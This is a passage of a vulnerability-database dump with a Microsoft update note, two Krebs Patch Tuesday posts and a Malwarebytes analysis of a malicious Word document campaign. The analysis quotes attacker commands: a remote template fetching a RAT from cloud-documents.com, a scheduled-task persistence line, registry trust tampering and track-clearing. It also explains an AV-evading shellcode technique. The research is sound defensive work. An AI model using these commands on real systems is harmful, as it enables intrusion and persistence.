\u201cKRB_GENERIC_ERROR\u201d, if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the USER_NO_AUTH_DATA_REQUIRED flag.\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online. \n * Addresses a reliability issue in Remote Desktop.\n * Addresses an issue that might cause stop error 7E in **nfssvr.sys** on servers running the Network File System (NFS) service.\n * Addresses an issue that excessively logs DfsSvc Event 14554 in the System event log by default once every hour for each DFS Namespace (DFSN). This update adds a new registry key, RootShareAcquireSuccessEvent, to enable or disable Event 14554.Keypath: HKEY_LOCAL_MACHINE/L\"System\\CurrentControlSet\\Services\\Dfs\\Parameters\"Default value = 0If RootShareAcquireSuccessEvent is not 0 or is not present = Enable log.If RootShareAcquireSuccessEvent is 0 = Disable log.Whenever you change RootShareAcquireSuccessEvent, you must restart the DFSN service.\n * Addresses an issue that causes an increase in network traffic during update detection for Windows Updates. This issue occurs on devices that are configured to use an authenticated user proxy as the fallback method if update detection with a system proxy fails or there is no proxy.\n * Security updates to the Windows Shell, Windows User Account Control (UAC), Windows Fundamentals, Windows Core Networking, Windows Hybrid Cloud Networking, Windows Kernel, Windows Virtualization, the Microsoft Graphics Component, Internet Explorer, Microsoft Edge Legacy, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released March 9, 2021 or March 15, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001633. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001078) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000803>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5000803](<https://download.microsoft.com/download/7/5/6/756f589c-b505-4341-b064-3f5e93f08aee/5000803.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000803 (OS Build 14393.4283)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000803", "href": "https://support.microsoft.com/en-us/help/5000803", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2021-03-18T09:57:50", "description": "On the off chance you were looking for more security to-dos from **Microsoft **today\u2026the company released software updates to plug more than 82 security flaws in Windows and other supported software. Ten of these earned Microsoft's "critical" rating, meaning they can be exploited by malware or miscreants with little or no help from users.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2020/08/windowsec.png)\n\nTop of the heap this month (apart from the [ongoing, global Exchange Server mass-compromise](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>)) is a patch for an **Internet Explorer** bug that is seeing active exploitation. The IE weakness -- [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>) -- affects both IE11 and newer EdgeHTML-based versions, and it allows attackers to run a file of their choice by getting you to view a hacked or malicious website in IE.\n\nThe IE flaw is tied to a vulnerability that was publicly disclosed in early February by researchers at [ENKI](<http://enki.co.kr/blog/2021/02/04/ie_0day.html>) who claim it was one of those [used in a recent campaign by nation-state actors to target security researchers](<https://www.bleepingcomputer.com/news/security/hacking-group-also-used-an-ie-zero-day-against-security-researchers/>). In the ENKI blog post, the researchers said they will publish proof-of-concept (PoC) details after the bug has been patched.\n\n"As we\u2019ve seen in the past, once PoC details become publicly available, attackers quickly incorporate those PoCs into their attack toolkits," said **Satnam Narang**, staff research engineer at **Tenable**. "We strongly encourage all organizations that rely on Internet Explorer and Microsoft Edge (EdgeHTML-Based) to apply these patches as soon as possible."\n\nThis is probably a good place to quote [Ghacks.net's Martin Brinkman](<https://www.ghacks.net/2021/03/09/microsoft-windows-security-updates-march-2021-overview/>): This is [the last patch hurrah](<https://www.ghacks.net/2021/01/31/reminder-microsoft-edge-legacy-will-be-retired-in-march-2021/>) for the legacy Microsoft Edge web browser, which is being retired by Microsoft.\n\nFor the second month in a row, Microsoft has patched scary flaws in the DNS servers on **Windows Server 2008** through **2019** versions that could be used to remotely install software of the attacker\u2019s choice. All five of the DNS bugs quashed in today's patch batch earned a CVSS Score (danger metric) of 9.8 -- almost as bad as it gets.\n\n"There is the outside chance this could be wormable between DNS servers," warned Trend Micro's **Dustin Childs**.\n\nAs mentioned above, hundreds of thousands of organizations are in the midst dealing with a security nightmare after having their Exchange Server and Outlook Web Access (OWA) hacked and retrofitted with a backdoor. If an organization you know has been affected by this attack, please have them check with the new victim notification website [mentioned in today's story](<https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/>).\n\n**Susan Bradley** over at [Askwoody.com says](<https://www.askwoody.com/2021/march-patching-madness-begins/>) "nothing in the March security updates (besides the Exchange ones released last week) is causing me to want to urge you to go running to your machines and patch at this time." I'd concur, unless of course you cruise the web with older Microsoft browsers.\n\n**Update, Mar. .11, 9:32 a.m.: **AskWoody now says any delay in patching may have been warranted. "We are seeing issues with printing after the March updates. Ghacks reports BSODs are being triggered after printing. It\u2019s unclear if it\u2019s all of the March operating system updates or just the Windows 10 versions. Note it appears that Microsoft has pulled the updates from Windows update but NOT from WSUS or the catalog site."\n\n_Original story:_\n\nIt\u2019s a good idea for Windows users to get in the habit of updating at least once a month, but for regular users (read: not enterprises) it\u2019s usually safe to wait a few days until after the patches are released, so that Microsoft has time to iron out any kinks in the new armor.\n\nBut before you update, _please_ make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.\n\nAdditional reading:\n\nMartin Brinkman's [always comprehensive take](<https://www.ghacks.net/2021/03/09/microsoft-windows-security-updates-march-2021-overview/>).\n\nThe **SANS Internet Storm Center** [no-frills breakdown of the fixes](<https://isc.sans.org/forums/diary/Microsoft+March+2021+Patch+Tuesday/27184/>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-10T01:42:39", "type": "krebs", "title": "Microsoft Patch Tuesday, March 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-03-10T01:42:39", "id": "KREBS:83CB7FE17AB0EB62BC1947A917C7546C", "href": "https://krebsonsecurity.com/2021/03/microsoft-patch-tuesday-march-2021-edition/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-27T10:06:23", "description": "**Microsoft** today released updates to plug at least 120 security holes in its **Windows** operating systems and supported software, including two newly discovered vulnerabilities that are actively being exploited. Yes, good people of the Windows world, it's time once again to backup and patch up!\n\n![](https://krebsonsecurity.com/wp-content/uploads/2020/08/windowsec.png)At least 17 of the bugs squashed in August's patch batch address vulnerabilities Microsoft rates as "critical," meaning they can be exploited by miscreants or malware to gain complete, remote control over an affected system with little or no help from users. This is the sixth month in a row Microsoft has shipped fixes for more than 100 flaws in its products.\n\nThe most concerning of these appears to be [CVE-2020-1380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1380>), which is a weaknesses in **Internet Explorer** that could result in system compromise just by browsing with IE to a hacked or malicious website. Microsoft's advisory says this flaw is currently being exploited in active attacks.\n\nThe other flaw enjoying active exploitation is [CVE-2020-1464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1464>), which is a "spoofing" bug in virtually all supported versions of Windows that allows an attacker to bypass Windows security features and load improperly signed files. For more on this flaw, see [Microsoft Put Off Fixing Zero for 2 Years](<https://krebsonsecurity.com/2020/08/microsoft-put-off-fixing-zero-day-for-2-years/>).\n\n**Trend Micro's Zero Day Initiative** points to another fix -- [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) -- which involves a critical issue in **Windows Server** versions that could let an unauthenticated attacker gain administrative access to a Windows domain controller and run an application of their choosing. A domain controller is a server that responds to security authentication requests in a Windows environment, and a compromised domain controller can give attackers the keys to the kingdom inside a corporate network.\n\n"It\u2019s rare to see a Critical-rated elevation of privilege bug, but this one deserves it," said ZDI'S **Dustin Childs**. "What\u2019s worse is that there is not a full fix available."\n\nPerhaps the most "[elite](<https://en.wikipedia.org/wiki/Leet>)" vulnerability addressed this month earned the distinction of being named [CVE-2020-1337](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1337>), and refers to a security hole in the **Windows Print Spooler** service that could allow an attacker or malware to escalate their privileges on a system if they were already logged on as a regular (non-administrator) user.\n\n**Satnam Narang** at **Tenable** notes that CVE-2020-1337 is a patch bypass for [CVE-2020-1048](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1048>), another Windows Print Spooler vulnerability that was patched in May 2020. Narang said researchers found that the patch for CVE-2020-1048 was incomplete and presented their findings for CVE-2020-1337 at the **Black Hat** security conference earlier this month. More information on CVE-2020-1337, including a video demonstration of a proof-of-concept exploit, is available [here](<https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/>).\n\n**Adobe** has graciously given us another month's respite from patching **Flash Player** flaws, but it did release critical security updates for its **Acrobat** and **PDF Reader** products. More information on those updates is available [here](<https://helpx.adobe.com/security/products/acrobat/apsb20-48.html>).\n\nKeep in mind that while staying up-to-date on Windows patches is a must, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re less likely to pull your hair out when the odd buggy patch causes problems booting the system.\n\nSo do yourself a favor and backup your files before installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd as ever, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-08-11T20:55:02", "type": "krebs", "title": "Microsoft Patch Tuesday, August 2020 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1337", "CVE-2020-1380", "CVE-2020-1464", "CVE-2020-1472"], "modified": "2020-08-11T20:55:02", "id": "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62", "href": "https://krebsonsecurity.com/2020/08/microsoft-patch-tuesday-august-2020-edition/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-08-02T20:33:41", "description": "_This blog post was authored by Hossein Jazi._\n\nOn July 21, 2021, we identified a suspicious document named "\u041c\u0430\u043d\u0438\u0444\u0435\u0441\u0442.docx" ("Manifest.docx") that downloads and executes two templates: one is macro-enabled and the other is an html object that contains an Internet Explorer exploit.\n\nWhile both techniques rely on template injection to drop a full-featured Remote Access Trojan, the IE exploit (CVE-2021-26411) previously used by the Lazarus APT is an unusual discovery. The attackers may have wanted to combine a social engineering technique with a known exploit to maximize their chances of infecting targets.\n\nWe also uncovered a panel used by the threat actor nicknamed "Ekipa" which seems to be a slang for "equipment". Victims are tracked and statistics include whether the IE exploit was successful or not.\n\nWe could not determine who might be behind this attack based on the techniques alone, but a decoy document displayed to victims may give some clues. It contains a statement from a group associating with Andrey Sergeevich Portyko and opposed to Putin's policies on the Crimean peninsula.\n\n### Remote templates\n\nBy looking closer at the remote template embedded in `settings.xml.rels` we noticed that it contains a full featured VBA Rat that performs the following actions:\n\n * Collects victim's info\n * Identifies the AV product running on a victim's machine\n * Executes shell-codes\n * Deletes files\n * Uploads and downloads files \n * Reads disk and file systems information\n\nThe second template is embedded in `Document.xml.rels` and is loaded into the document. Looking at the loaded code we noticed that it contains an [IE Exploit (CVE-2021-26411)](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) that was once used by Lazarus APT to target security researchers working on vulnerability disclosure, as reported by the threat research teams at [Google](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) and [Microsoft](<https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/>). The shell-code executed using this exploit deploys the same VBA Rat that was loaded using remote template injection. \n\nAfter loading the remote templates the malicious document loads a decoy document in Russian which is pretty interesting. The decoy document is a statement from a group within Crimea that voices opposition to Russia and specifically Putin's policies against that peninsula. In the following, you can see this statement in both Russian and English language.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/decoy-2-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/decoy-2-1.png> \"\" )Figure 1: Decoy document\n\n### Document Analysis\n\nThe malicious document ("\u041c\u0430\u043d\u0438\u0444\u0435\u0441\u0442.docx") contains two templates in `settings.xml.rels` and `document.xml.rels`. The remote template that is located in `settings.xml.rels` downloads a macro weaponized template and loads it into current document. This remote template contains a macro code with full-featured Rat functionality. We provide the analysis of this VBA Rat in the next section.\n \n \n <?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n <Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate\" Target=\"HtTpS:\\\\cloud-documents.com/doc/t.php?action=show_content\" TargetMode=\"External\"/></Relationships>\n\nThe second template is embedded in` document.xml.rels` and will be loaded in an object in the main document. This template contains an exploit code for CVE-2021-26411.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/doc.rels_.xml_-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/doc.rels_.xml_-1.png> \"\" )Figure 2: Document.xml.rels\n\nThis exploit code used by this remote template is almost similar to what has been reported by [ENKI](<https://enki.co.kr/blog/2021/02/04/ie_0day>) security firm. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/zero-day-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/zero-day-1.png> \"\" )Figure 3: Exploit code\n\nThe shell-code executed by this exploit deploys the same VBA Rat that is also loaded using the remote template embedded in `settings.xml.rels`. In fact, the actor tries to deploy its VBA Rat using two different methods. \nThe shell-code is very simple and performs the following actions. The shell-code is written in the [AutoHotKey](<https://www.autohotkey.com/docs/Language.htm>) scripting language and all of its actions are executed using `SendInput` API call. \n\n * Add VBA Rat as Trusted document to TrustedRecords registry key. By adding this Rat to this registry there won't be any need to enable the macro when this document will be opened next time. \n`reg add \\\"HKCU\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\16.0\\\\Word\\\\Security\\\\Trusted Documents\\\\TrustRecords\\\" /V https://cloud-documents.com/doc/templates/agent.dotm /t REG_BINARY /d 00000000000000000040230e43000000f9d99c01ffffff7f /f\"`\n * Get the VBA Rat using: `Winword /w https://cloud-documents.com/doc/t.php?document_show=notica`\n * Make this VBA Rat persistence by creating a Scheduled task to execute it every minute: \n`SCHTASKS /Create /SC MINUTE /MO 1 /TN \\\"z\\\" /TR winword.exe ' /q /w %appdata%\\Microsoft\\Word\\Startup\\_.dotm`\n * Delete `RunMru` registry value to clear its track records. \n`Reg delete HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMru \\f`\n\n### VBA Rat analysis (Remote Template)\n\nThe remote template contains `Document_Open` and `Document_Close` which are activated upon opening and closing the document. \n\n#### Document_Open:\n\nThe `Document_open` function checks if the active document has the docx extension and if that is the case it shows the hidden content (decoy content). Then, if the active document name is `\"_.dotm\"` (this is the case when the machine is already infected with this Rat), it calls `\"ConnectCP\"` function. The `ConnectCP` function is responsible for collecting victim's info by calling the following functions as well as a value named `\"cve\"` in `CustomDocumentProperties` (this value is being set during the first execution of this document).\n\nAfter collecting data, it converts it into a json format by using the `JsonConvertor` function. The collected data later is used by the `SCI` function to be sent to the server and receive commands. \n\n * getUUID: Gets UUID by executing `\"SELECT * FROM Win32_ComputerSystemProduct\"`\n * getOS: Gets OS type by executing `\"SELECT * FROM Win32_OperatingSystem\"`\n * arch: Returns OS architecture\n * getCPU: Gets CPU info by executing `\"SELECT * FROM Win32_Processor\"`\n * getGPU: Gets GPU info by executing `\"SELECT * FROM Win32_VideoController\"`\n * getRAM: Gets physical memory capacity by executing` \"SELECT * FROM Win32_PhysicalMemory\"`\n * getStorage: Gets available hard drive space by executing `\"Select * from Win32_LogicalDisk Where DriveType = 3\"`\n * getName: Gets computer name, user name and domain name\n * getRole: Identify if the victim has admin role or not.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/getrole-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/getrole-1.png> \"\" )Figure 4: GetRole\n\n * getAV: Gets Anti-Virus product info including the AV name, AV status (enabled or disabled) and AV signature stature (outdated or actual). To get these info it executes `\"Select * from AntiVirusProduct\"` to get the list of active Anti Virus products and then calls `DisplayName` to get the AV name and then identify the AV status and AV signature status using the product state codes. As an example if the product state code is 266240, it means that the AV product is enabled and its signature is updated. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/getav-5.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/getav-5.png> \"\" )Figure 5: GetAV\n\nAt the end, the `ConnectCP` function calls the `StartTimer` function to start the task execution procedure (`ExecuteTasks` function). This function creates a timer that calls the `ExecuteTasks` function every 10 minutes to execute the tasks received from the server.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/timer-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/timer-1.png> \"\" )Figure 6: Set Timer\n\nIf the active document name is not `\"_.dotm\"` (The machine has not been infected before with this VBA Rat), it calls a function named `InstallFromExp` after making sure it is not running within a Sandbox environment and its extension is `dotm`. The attacker checks the value of the following registry key and if the value is equal to one it won't execute the `InstallFromExp`.\n \n \n HKCU\\Software\\Microsoft\\Office\\&Application.Version&\\Excel\\Security\\VBAWarnings\n\nThe value one for this registry key means that all untrusted and trusted macros are allowed to run without any notification which usually is a default setting for sandbox environments to run macro embedded documents automatically. \n\n`InstallFromExp` performs the basic initialization of this Rat which includes the following three actions: \n\n * Sets the `customDocumentProperties` named `\"cve\" `to "2021-26411".\n * Makes itself persistence by adding itself to word startup directory with `\"_.dotm\"` name: `APPDATA\\Microsoft\\Word\\StartUp\\_.dotm`\n * Cleans up its track records by deleting `RunMRU` registry key\n * Exits the program\n\n#### **Document_Close**\n\nThis function also performs the installation of the Rat but by calling a different function: `InstallFromMacro`. Before calling the installation function it calls the same `Sandbox` function to make sure it is not running into a sandbox environment and then checks if the path of the attached template includes `http` to make sure it has an embedded remote template url.\n\n`InstallFromMacro` performs initialization of the Rat which includes the following three actions:\n\n * Opens the attached remote template as a document and extract the contents of the comments section of the BuiltInDocumentProperties and spilts it by "|". If the OS is 32 bit it takes the first part of the the comments and puts it in `skd` variable and if the OS is 64 bit it takes the second part of the comments section and puts it into `skd`. The `skd` variable later is used as a parameter for `AddTask` function.\n * Sets the `customDocumentProperties` named "cve" to "MACRO".\n * Make itself persistence by adding itself to word startup directory with "_.dotm" name: `APPDATA\\Microsoft\\Word\\StartUp\\_.dotm`\n * Calls `AddTask` function\n * Cleans up its track records by deleting `RunMRU` registry key\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/installrat.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/installrat.png> \"\" )Figure 7: Rat installation\n\n### AddTask (Shell-Code execution using EnumWindows)\n\nThis function base64 decodes the content from the `skd` variable that has been set in `InstallFromMacro` function and executes it using `VirtualProtect` and `EnumWindows`. In fact the content of the `skd` is a small shell-code that has been executed within the memory without being written into disk. The actor has used an interesting API call for ShellCode execution. Instead of using well known API calls for shell code execution which can easily get flagged by AV products such as `VirtualAlloc`, `WriteProcessMemory`, and `CreateThread` the actor has used `EnumWindows` to execute its shell-code.\n\nThe second argument of `EnumWindows` is an application-defined value to be passed to the callback function. By providing the address of the shell-code from `VirtualProtect` as second parameter to this function, it can execute the Shell-code.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/addtask-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/addtask-1.png> \"\" )Figure 8: AddTask\n\nThe executed shell-code is very small and it just persists by creating a Scheduled task to execute it every minute:\n\n`SCHTASKS /Create /SC MINUTE /MO 1 /TN \\\"z\\\" /TR winword.exe ' /q /w %appdata%\\Microsoft\\Word\\Startup\\_.dotm`\n\nSimilar to the shell-code used in IE exploit, this shell-code is also written using AutoHotKey scripting language and it is using `SendmessageA` and `SendInput` to simulate keystrokes and perform its actions. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/shellcode.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/shellcode.png> \"\" )Figure 9: Shell-code API and function calls resolving \n\n### ExecuteTasks\n\nThis is the main function of this VBA Rat that receives the command from the server in Json format and then parses the json file and executes the command. Each time this function can execute three tasks. This has probably been set to avoid making noise in network activities which might be detected by security products. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/ExecuteTasks-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/ExecuteTasks-1.png> \"\" )Figure 10: Executes tasks\n\nTo receive the tasks from the server this function receives one argument which is a function named `SCI`. `SCI` function sends the collected data by `ConnectCP` function in json format in a `HTTP POST` request and receives the response from the server which includes the tasks that need to be executed in JSON format.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/sci-2.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/sci-2.png> \"\" )Figure 11: Send info to server and receive commands\n\nHere is the list of commands that can be executed by this Rat. After executing each task the results of task execution will be sent to server.\n\n#### ReadDisks\n\nIt gets each Drive information on the machine using `Scripting.FileSystemObject.Drives` object. It then creates a JSON object which includes the following key and values for each drive object:\n\n * IsReady: this value sets to true if the drive is ready\n * Label: gets name of the drive which will be either ShareName or VolumeName. This depends on whether the drive is remote or not\n * Filesystem: gets the file system in use for the drive\n * Freespace: gets the amount of free space for the drive in KB \n * Name: gets the drive letter\n * IsDirectory: This value is always True\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/readdisks-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/readdisks-1.png> \"\" )Figure 12: Read Disks\n\n#### ReadFileSystem\n\nThis function gets a Folder object corresponding to the folder in a specified path using `Scripting.FileSystemObject.GetFolder` object and then extracts it name, size, date last modified and puts them into a Json object. It also extracts the same information for all sub-folders and files in that Folder object and adds them to the Json object.\n\n#### Download File\n\nThis function reads a specified file using `Adobe.Recordset `and sends the data to sever using HTTP POST request. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/DOWNLOAD-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/DOWNLOAD-1.png> \"\" )Figure 13: Download File\n\n#### Upload File\n\nThis module receives a file from the server and writes it into specified file. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/UPLOAD-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/UPLOAD-1.png> \"\" )Figure 14: Upload File\n\n#### DeleteFile\n\nThis function uses Kill function to delete the specified file or directory. \n\n#### Terminate\n\nThis function terminates the execution of the Rat and exits the application.\n\n#### Execute\n\nThis function executes the received shell-code from the server using the same method used in `AddTask` function in which it has used `VirtualProtect `and `EnumWindows` to execute the shell-code. \n\n![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/executr-1.png)Figure 15: Execute Shell-code\n\n#### ChangeTiming\n\nThis function resets the timer that is used to execute tasks every 10 minutes by calling `EndTimer` to kill the timer and then calling `StartTimer` to start a new timer. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/str.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/str.png> \"\" )Figure 16: Send results\n\n### Attacker panel\n\nWe were able to access to the panel used by the attacker. The panel's main page includes the list of victims with some information about them including: IP address, date and time, NTLM, Windows version, Windows Architecture, Office version, Office architecture, IE version, Exploited (shows if the IE zero day was successful or not), Loader (shows if the VBA Rat successfully executed or not) and note. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2021/07/panel-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2021/07/panel-1.png> \"\" )Figure 17: The panel\n\nThe panel is written in PHP with a backed SQL database to store data. This `install.php` initializes the SQL 